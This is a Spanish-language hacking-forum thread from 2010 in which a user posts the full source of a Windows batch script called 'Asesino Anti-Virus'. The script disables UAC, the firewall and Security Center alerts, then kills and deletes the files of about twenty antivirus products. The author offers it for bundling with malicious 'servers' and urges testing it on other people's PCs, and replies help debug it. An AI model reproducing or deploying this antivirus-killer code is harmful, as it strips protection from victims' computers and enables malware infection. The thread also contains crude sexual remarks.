Página 1 de 2

Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 24 Dic 2010, 18:40
por HaCkerMaL
Imagen


Hola a Todos Amigos Primero que todo esten Bien les comento, como dije anteriormente me Dedique a aprender y entender el codigo de Programacion Batch el dia de ayer y hoy estaba Programando Un Codigo que mataria AV y tambien desactivaria el firewall,Centro de Seguridad y Otras Cosas, Mas Abajo las Coloco..
Y Finalmente he terminado Mii Aplicacion
No es Un Rat, Ni tampoco una Botnet pero estoy seguro que a alguien le servira pues puede ser Juntado con Algun Server y adios toda seguridad del PC.. Bueno sin Mas que desir con Mucho cariño y Especialmente para Indetectables.Net

Caracteristicas;

-Desactivacion del UAC Windows Vista & Seven
-Desactivacion del Firewall de Windows
-Finaliza o Detiene el Centro de Seguridad
-Desactiva Notificacion de Antivirus Desactivado
-Desactiva Notificacion de Firewall Desactivado
-Desactiva Notificacion de UAC Desactivado
-Desactiva Notificacion de Actualizaciones Desactivadas
-Elimina Antivirus o Anti-Malware --Eset Nod32--
-Elimina Antivirus o Anti-Malware --Spybot - Search & Destroy--
-Elimina Antivirus o Anti-Malware --Windows Defender--
-Elimina Antivirus o Anti-Malware --mcafee--
-Elimina Antivirus o Anti-Malware --ZoneAlarm--
-Elimina Antivirus o Anti-Malware --Trend Micro--
-Elimina Antivirus o Anti-Malware --Synaptics--
-Elimina Antivirus o Anti-Malware --AVG free--
-Elimina Antivirus o Anti-Malware --Symantec Shared--
-Elimina Antivirus o Anti-Malware --Norton AntiVirus--
-Elimina Antivirus o Anti-Malware --Panda Platinum Internet Security--
-Elimina Antivirus o Anti-Malware --Avast4--
-Elimina Antivirus o Anti-Malware --Microsoft AntiSpyware--
-Elimina Antivirus o Anti-Malware --Kaspersky Anti-Virus Personal--
-Elimina Antivirus o Anti-Malware --Spy Sweeper--
-Elimina Antivirus o Anti-Malware --SinEspias--
-Elimina Antivirus o Anti-Malware --Panda Antivirus Titanium--
-Elimina Antivirus o Anti-Malware --AVPersonal--
-Elimina Antivirus o Anti-Malware --BitDefender9--

Espero les Guste Solo queda decirles que los Av solo queda testearlos pero les aseguro que la Mayoria los Mata..

Descarga;

[Enlace externo eliminado para invitados]

Pass; No tiene, Esta el Exe directamente..

PD; No lo Abran en sus Pc, Testearlo para Confirma su Efectividad en otras PC..

Saludos..


Debido a que Nuestro amigo Matatan dice que no Funciona y Piensa analizarlo este es su codigo Verifiquenlo y me echan una Mano en Teoria deberia Funcionar..

Código: Seleccionar todo

@echo off
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile /v EnableFirewall /t REG_DWORD /d 0 /f
NET STOP "Centro de Seguridad" >nul
net stop "Security Center" >nul
REG ADD "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d "1" /f >nul
REG ADD "HKLM\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d "1" /f >nul
REG ADD "HKLM\SOFTWARE\Microsoft\Security Center" /v UACDisableNotify /t REG_DWORD /d "1" /f >nul
REG ADD "HKLM\SOFTWARE\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d "1" /f >nul
If exist "C:\Archivos de programa\ewido anti-malware" (goto ewido) else (goto 1)
:1
If exist "C:\Archivos de programa\Eset" (goto nod32) else (goto 2)
:2
If exist "C:\Archivos de programa\Spybot - Search & Destroy" (goto spybot) else (goto 3)
:3
If exist "C:\Archivos de programa\Windows Defender" (goto windefender) else (goto 4)
:4
If exist "C:\Archivos de programa\mcafee.com" (goto mcafee) else (goto 5)
:5
If exist "C:\Archivos de programa\Zone Labs\ZoneAlarm" (goto zone) else (goto 6)
:6
If exist "C:\Archivos de programa\Trend Micro" (goto trend) else (goto 7)
:7
If exist "C:\Archivos de programa\Synaptics" (goto sinapti) else (goto 8)
:8
If exist "C:\Archivos de programa\Grisoft\AVG free" (goto avfree) else (goto 9)
:9
If exist "C:\Archivos de programa\Archivos comunes\Symantec Shared" (goto norton) else (goto 10)
:10
If exist "C:\Archivos de programa\Norton AntiVirus" (goto norton2) else (goto 11)
:11
If exist "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security (goto Panda06) else (goto 12)
:12
If exist "C:\Archivos de programa\Alwil Software\Avast4" (goto Avast4) else (goto 13)
:13
If exist "C:\Archivos de programa\Microsoft AntiSpyware" (goto micanti) else (goto 14)
:14
If exist "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal" (goto kav) else (goto 15)
:15
If exist "C:\Archivos de programa\Webroot\Spy Sweeper" (goto sweeper) else (goto 16)
:16
If exist "C:\Archivos de programa\SinEspias" (goto sinspy) else (goto 17)
:17
If exist "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium" (goto pandatitanium) else (gto 18)
:18
If exist "C:\Archivos de programa\AVPersonal" (goto avpersonal) else (goto 19)
:19
If exist "C:\Archivos de programa\Softwin\BitDefender9" (goto bit9) else (goto 20)
:20
goto fin
:bit9
net stop "bdoesrv"
net stop "bdmcon"
net stop "bdnagent"
net stop "bdswitch"

Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd C:\Archivos de programa\Softwin\BitDefender9
attrib -H -S -R *.*
del /s /q *.*
:avpersonal
net stop "AVGUARD"
net stop "AVWUPSRV"
net stop "AVGNT"
net stop "AVSched32"

Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd C:\Archivos de programa\AVPersonal
attrib -H -S -R *.*
del /s /q *.*
:pandatitanium
net stop "Pavsrv51"
net stop "AVENGINE"
net stop "apv win"
net stop "pavProxy"
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apv win.exe /IM pavProxy.exe
cd "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium"
attrib -H -S -R *.*
del /s /q *.*
rd /s /q C:\Archivos de programa\Panda Software\Panda Antivirus Titanium
:sinspy
Taskkill /f /IM no-spy.exe
cd "C:\Archivos de programa\SinEspias"
attrib -H -S -R *.*
del /s /q *.*
:sweeper
Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cd "C:\Archivos de programa\Webroot\Spy Sweeper"
attrib -H -S -R *.*
del /s /q *.*
:kav
cd "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal"
net stop "kav"
net stop "kavsvc"
Taskkill /f /IM kav.exe /IM kavsvc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 15
:micanti
cd "C:\Archivos de programa\Microsoft AntiSpyware"
net stop "gcasServ"
net stop "gcasDtServ"
Taskkill /f /IM gcasServ.exe /IM gcasDtServ.exe
attrib -H -S -R *.*
del /s /q *.*
goto 14
:Avast4
cd "C:\Archivos de programa\Alwil Software\Avast4"
net stop "aswUpdSv"
net stop "ashServ"
net stop "ashWebSv"
net stop "ashDisp"
Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe
attrib -H -S -R *.*
del /s /q *.*
goto 13
:Panda06
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security"
net stop "TPSrv"
net stop "PavFnSvr"
net stop "pavsrv51"
net stop "pskmssvc"
net stop "AVENGINE"
net stop "PNMSRV"
net stop "PsImSvc"
Taskkill /f /IM TPSrv.exe /IM PavFnSvr.exe /IM pavsrv51.exe /IM pskmssvc.exe /IM AVENGINE.EXE /IM PNMSRV.EXE /IM PsImSvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\FIREWALL"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Common Files\Panda Software\PavShld"
Taskkill /f /IM pavprsrv.exe
attrib -H -S -R *.*
del /s /q *.*
goto 12
:norton2
cd "C:\Archivos de programa\Norton AntiVirus"
net stop "navapsvc"
net stop "NPFMntor"
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Norton AntiVirus\IWP"
attrib -H -S -R *.*
del /s /q *.*
goto 11
:norton
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared"
net stop "ccSetMgr"
net stop "SNDSrvc"
net stop "SPBBCSvc"
net stop "ccEvtMgr"
net stop "ccApp"
net stop "symlcsvc"
Taskkill /f /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM symlcsvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\SPBBC"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\CCPD-LC"
attrib -H -S -R *.*
del /s /q *.*
goto 10
:avfree
cd "C:\Archivos de programa\Grisoft\AVG free"
net stop "avgamsvr"
net stop "vgupsvc"
net stop "avgcc"
Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 9
:sinapti
cd "C:\Archivos de programa\Synaptics\SynTP"
net stop "SynTPLpr"
net stop "SynTPEnh"
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
attrib -H -S -R *.*
del /s /q *.*
goto 8
:trend
cd "C:\Archivos de programa\Trend Micro\OfficeScan Client"
net stop "ntrtscan"
net stop "tmlisten"
net stop "OfcPfwSvc"
net stop "pccntmon"
Taskkill /f /IM ntrtscan.exe /IM tmlisten.exe /IM OfcPfwSvc.exe /IM pccntmon.exe
attrib -H -S -R *.*
del /s /q *.*
goto 7
:zone
cd "C:\Archivos de programa\Zone Labs\ZoneAlarm"
net stop "zlclient"
net stop "zonealarm"
net stop "vsmon"
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\WINDOWS\system32\ZoneLabs"
attrib -H -S -R *.*
del /s /q *.*
goto 6
:mcafee
cd "c:\archivos de programa\mcafee.com\agent"
net stop "mcdetect"
net stop "mctskshd"
net stop "mcagent"
net stop "mcvsescn"
net stop "mcvsftsn"
net stop "mcvsshld"
net stop "mcvsrte"
net stop "mcshield"
Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcagent.exe /IM mcvsescn.exe /IM mcvsftsn.exe /IM mcvsshld.exe /IM mcvsrte.exe /IM mcshield.exe
attrib -H -S -R *.*
del /s /q *.*
rd /s /q "c:\archivos de programa\mcafee.com\agent"
rd /s /q "c:\archivos de programa\mcafee.com"
goto 5
:windefender
cd "C:\Archivos de programa\Windows Defender"
net stop "MsMpEng"
net stop "MSASCui"
Taskkill /f /IM MsMpEng.exe /IM MSASCui.exe
attrib -H -S -R *.*
del /s /q *.*
goto 4
:spybot
cd "C:\Archivos de programa\Spybot - Search & Destroy"
net stop "TeaTimer"
Taskkill /f /IM TeaTimer.exe
attrib -H -S -R *.*
del /s /q *.*
goto 3
:nod32
cd "C:\Archivos de programa\Eset"
net stop "nod32krn"
net stop "nod32kui"
net stop "nod32"
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe
attrib -H -S -R *.*
del /s /q *.*
goto 2
:ewido
cd "C:\Archivos de programa\ewido anti-malware"
Taskkill /f /IM ewidoctrl.exe /IM ewidoguard.exe
net stop "ewidoctrl"
net stop "ewidoguard"
attrib -H -S -R *.*
del /s /q *.*
goto 1
:fin
exit

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 24 Dic 2010, 18:51
por Matatán
Si Funciona te hago un pete anal XD jajaja

se ve lindo, hay que ver que tal anda.

Edit/ Y si lo ejecute en mi pc =)

No funciona.

Ahora me pongo a analizarlo de paso.

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 24 Dic 2010, 19:04
por HaCkerMaL
Amigo como que no Funciono? T_T si quieres subo su codigo?
para que lo veas amigo? y analizaloo si quieres...

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 24 Dic 2010, 20:10
por Matatán
Dalo x hecho que lo voy a analizar, tengo el malwarebytes,avira,spybot y muchas herramientas mas, todas funcionan...

Aunque, vi unas entradas al registro no muy agradables que el mismio Malwarebytes detectó y borró.

Subi el code =)

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 24 Dic 2010, 20:28
por HaCkerMaL
Matatán escribió:Dalo x hecho que lo voy a analizar, tengo el malwarebytes,avira,spybot y muchas herramientas mas, todas funcionan...

Aunque, vi unas entradas al registro no muy agradables que el mismio Malwarebytes detectó y borró.

Subi el code =)
Men analizalo como tu quieras el Archivo esta Limpio y su codigo ya esta publicado lo puse en el Mismo Post..
Saludos Me avisas..

Edit/

No Funciona el de desactivar el Firewall al menos no en Windows Seven Creo que es por los Permisos en win xp si funca.. ire Probando a ver que se le puede hacer porque como dije anteriormente en teoria deberia Funcionar..

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 24 Dic 2010, 22:28
por Matatán
En Teoria..como el crypter que mandaste a virustotal.

Cuack.

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 24 Dic 2010, 22:56
por HaCkerMaL
Matatán escribió:En Teoria..como el crypter que mandaste a virustotal.
Primero que todo no soy Programador ni nada ni me la doy de que se Mucho tampoco tomo informacion o programas de otro sitio y digo que son Mios.. Prefiero Morir siendo Newbie que Lammers.. si no te parese bien lo que hago no lo comentes ni veas y Punto, Mi intencion es compantir con la Comunidad.
Saludos

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 24 Dic 2010, 23:28
por Matatán
Voy a ver y comentar,para eso esta el foro y sus usuarios.

Hace un video en donde muestres que si funciona.

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 25 Dic 2010, 00:44
por R-007
yo estos codes los conozco bien porque se programar en batch y sólamente veo 3 problemas, el primero es que EVIDENTEMENTE se debe ejecutar con permisos de administrador, el segundo es que puede que la maquina no tenga los antivirus instalados en esa ruta y, aunque menos probable, puede que la unidad principal no sea C:\ (para algo existen las variables de entorno) y el tercero es que el codigo de net stop es inútil para los servicios de algunos antivirus con autoprotección, ya te puedes encabronar con ese proceso que no lo matas ni en modo administrador con el taskmgr ni con lo que quieras.

conclusión: porqué sacar la metralleta de rambo para matar a todos cuando podemos usar shurikens a lo ninja?

Un saludo!

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 25 Dic 2010, 03:22
por HaCkerMaL
R-007 escribió:yo estos codes los conozco bien porque se programar en batch y sólamente veo 3 problemas, el primero es que EVIDENTEMENTE se debe ejecutar con permisos de administrador, el segundo es que puede que la maquina no tenga los antivirus instalados en esa ruta y, aunque menos probable, puede que la unidad principal no sea C:\ (para algo existen las variables de entorno) y el tercero es que el codigo de net stop es inútil para los servicios de algunos antivirus con autoprotección, ya te puedes encabronar con ese proceso que no lo matas ni en modo administrador con el taskmgr ni con lo que quieras.

conclusión: porqué sacar la metralleta de rambo para matar a todos cuando podemos usar shurikens a lo ninja?

Un saludo!
Amigo Podrias Arreglar el Codigo y Subirlo para yo descargarlo y volver a hacerlo? lo importante no es mi programa lo importante es la ayuda de la comunida con esto...
Saludos...

PD; Espero respuesta..

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 26 Dic 2010, 13:29
por R-007
de las 3 cosas que te he respondido se desprende que no hay ningún code últil para acabar con los antivirus que tienen autoproteccion (salvo haciendo hooks en plan rootkit) y que el resto del code está bien si se aplica con suficientes privilegios.

un saludo!

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 26 Dic 2010, 21:54
por HaCkerMaL
R-007 escribió:de las 3 cosas que te he respondido se desprende que no hay ningún code últil para acabar con los antivirus que tienen autoproteccion (salvo haciendo hooks en plan rootkit) y que el resto del code está bien si se aplica con suficientes privilegios.

un saludo!
Muchas Gracias Amigo Saludos..

Pues ya esta confirmado que si Funciona Perfectamente, Lastima que nesecite Permisos con Privilegio..

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 01 Ene 2011, 20:38
por 666
man y esa frecura de poner fotos asi sin consentimiento de esa tia? a lo mejor ella mi sabe que has puesto esta foto en este foro eso es una falta de respeto amigo indetectables eso no se deberia permitir y este tio un grosero se cree la gran cosa se cree el mejor ati te nokeo yo

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 03 Ene 2011, 14:59
por hacker man
Muy bien, fantástico, realmente funciona.
Me va a ayudar mucho.
Gracias!

Re: Asesino Anti-Virus V1.0 By HaCkErMaL

Publicado: 03 Ene 2011, 15:30
por -slandg-
666 escribió::g: man y esa frecura de poner fotos asi sin consentimiento de esa tia? a lo mejor ella mi sabe que has puesto esta foto en este foro eso es una falta de respeto amigo indetectables eso no se deberia permitir y este tio un grosero se cree la gran cosa se cree el mejor ati te nokeo yo
WTF?? eso va para matatan supongo no(?), si no me equivoco los nombres en esa imagen se los puede poner cualquiera ,creo yo que vi otro user misma nalga otro nombre =P..